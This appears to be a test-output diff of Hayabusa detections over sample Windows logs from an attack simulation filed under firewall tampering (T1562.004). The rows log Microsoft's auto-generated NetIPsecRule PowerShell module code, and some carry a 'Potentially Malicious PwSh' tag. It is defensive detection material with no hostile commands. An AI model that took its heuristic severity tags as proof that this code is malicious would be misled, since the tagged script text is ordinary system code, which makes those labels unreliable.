[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) 
$__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] 